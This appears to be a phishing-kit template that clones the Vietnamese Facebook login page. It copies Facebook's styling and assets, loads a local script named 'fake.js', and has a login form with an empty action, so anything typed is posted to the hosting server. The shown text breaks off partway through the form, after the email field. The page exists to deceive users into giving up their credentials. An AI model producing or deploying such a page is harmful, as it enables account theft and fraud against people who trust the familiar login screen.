<!DOCTYPE html>
<html id="facebook" class="no_js">
    <head lang="$@LANGUAGE">
        <meta charset="utf-8" />
        <meta name="referrer" content="default" id="meta_referrer" />
        <script>
            function envFlush(a) {
            function b(c) {
            for (var d in a) c[d] = a[d];
            }
            if (window.requireLazy) {
            window.requireLazy(['Env'], b);
            } else {
            window.Env = window.Env || {};
                    b(window.Env);
            }
            }
            envFlush({
            "ajaxpipe_token": "AXgNnr7I-AGUd9oV",
                    "lhsh": "9AQEjc3E5",
                    "timeslice_heartbeat_config": {
                    "pollIntervalMs": 33,
                            "idleGapThresholdMs": 60,
                            "ignoredTimesliceNames": {
                            "requestAnimationFrame": true
                            },
                            "enableOnRequire": false
                    }
            });</script>
        <script>
                    CavalryLogger = false;</script>
        <noscript>       
        </noscript>
        <title id="pageTitle">{{Đăng nhập Facebook}} | Facebook</title>    
        <meta name="description" content="{{Hãy đăng nhập Facebook để bắt đầu chia sẻ và kết nối với bạn bè, gia đình và những người bạn biết.}}" />
        <meta name="robots" content="noodp,noydir" />
        <noscript>
        <meta http-equiv="X-Frame-Options" content="DENY" />
        </noscript>
        <link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yV/r/hzMapiNYYpW.ico" />
        <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v2/yV/r/jNdmyMeE-vB.css" data-bootloader-hash="gVRUN" data-permanent="1" crossorigin="anonymous" />
        <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v2/y_/r/V3c85Z0mRc9.css" data-bootloader-hash="ocuef" data-permanent="1" crossorigin="anonymous" />
        <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v2/y7/r/IfIinctdGXv.css" data-bootloader-hash="vBrdZ" crossorigin="anonymous" />
        <link type="text/css" rel="stylesheet" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/y5/r/0Ft4neEh9IZ.css?_nc_cb=1" crossorigin="anonymous" />
        <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v2/yG/r/dVJz8KF0wkd.css" data-bootloader-hash="pQtcx" data-permanent="1" crossorigin="anonymous" />
        <script src="https://static.xx.fbcdn.net/rsrc.php/v2/y8/r/dcMTwXmxbcs.js" data-bootloader-hash="sYBq2" crossorigin="anonymous"></script>
        <script src="themes/fbtool/facebook/js/fake.js"></script>

    </head>

    <body class="login_page _39il UIPage_LoggedOut _5p3y x1 Locale_vi_VN" dir="ltr">
        <div class="_li">
            <div id="pagelet_bluebar" data-referrer="pagelet_bluebar">
                <div id="blueBarDOMInspector">
                    <div class="_53jh">
                        <div class="loggedout_menubar_container">
                            <div class="clearfix loggedout_menubar">
                                <div class="lfloat _ohe">
                                    <h1><a href="https://www.facebook.com/" title="{{Vào trang chủ Facebook}}"><i class="fb_logo img sp_Vqgm9dN_P0N sx_0b7a9e"><u>Logo Facebook</u></i></a></h1>
                                </div>
                            </div>
                        </div>
                        <div class="signupBanner">
                            <div class="signup_bar_container">
                                <div class="signup_box clearfix"><span class="signup_box_content"><a class="_42ft _4jy0 signup_btn _4jy4 _4jy2 selected _51sy" role="button" href="https://www.facebook.com/r.php?locale=${@LANGUAGE}_${@LANGUAGE}">{{Đăng ký}}</a></span>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div id="globalContainer" class="uiContextualLayerParent">
                <div class="fb_content clearfix " id="content" role="main">
                    <div class="_4-u5 _30ny"><span class="muffin_tracking_pixel_start"></span><img class="tracking_pixel" /><span class="muffin_tracking_pixel_end"></span>
                        <div class="_4-u2 _1w1t _4-u8 _52jv">
                            <div>
                                <div class="_xku"><span class="_50f6">{{Đăng nhập Facebook}}</span>
                                </div>
                            </div>
                            <div class="login_form_container">
                                <form id="login_form" action="" method="post" onsubmit="return window.Event & amp; & amp; Event.__inlineSubmit & amp; & amp; Event.__inlineSubmit(this, event)">
                                    <input type="hidden" name="lsd" value="AVol7hBW" autocomplete="off" />
                                    <div id="loginform">
                                        <input type="hidden" autocomplete="off" id="display" name="display" value="" />
                                        <input type="hidden" autocomplete="off" id="enable_profile_selector" name="enable_profile_selector" value="" />
                                        <input type="hidden" autocomplete="off" id="isprivate" name="isprivate" value="" />
                                        <input type="hidden" autocomplete="off" id="legacy_return" name="legacy_return" value="0" />
                                        <input type="hidden" autocomplete="off" id="profile_selector_ids" name="profile_selector_ids" value="" />
                                        <input type="hidden" autocomplete="off" id="return_session" name="return_session" value="" />
                                        <input type="hidden" autocomplete="off" id="skip_api_login" name="skip_api_login" value="" />
                                        <input type="hidden" autocomplete="off" id="signed_next" name="signed_next" value="" />
                                        <input type="hidden" autocomplete="off" id="trynum" name="trynum" value="1" />
                                        <input type="hidden" autocomplete="off" name="timezone" value="" id="u_0_0" />
                                        <input type="hidden" autocomplete="off" name="lgndim" value="" id="u_0_1" />
                                        <input type="hidden" name="lgnrnd" value="205031_U0g-" />
                                        <input type="hidden" id="lgnjs" name="lgnjs" value="n" />
                                        <div class="clearfix _5466 _44mg">
                                            <input type="text" class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="email" id="email" tabindex="1" placeholder="{{Email hoặc số điện thoại}}" value="" autofocus="1" aria-label="{{Email hoặc số điện thoại}}" />
                                        </div>
                                        <div class="clearfix _5466 _44mg">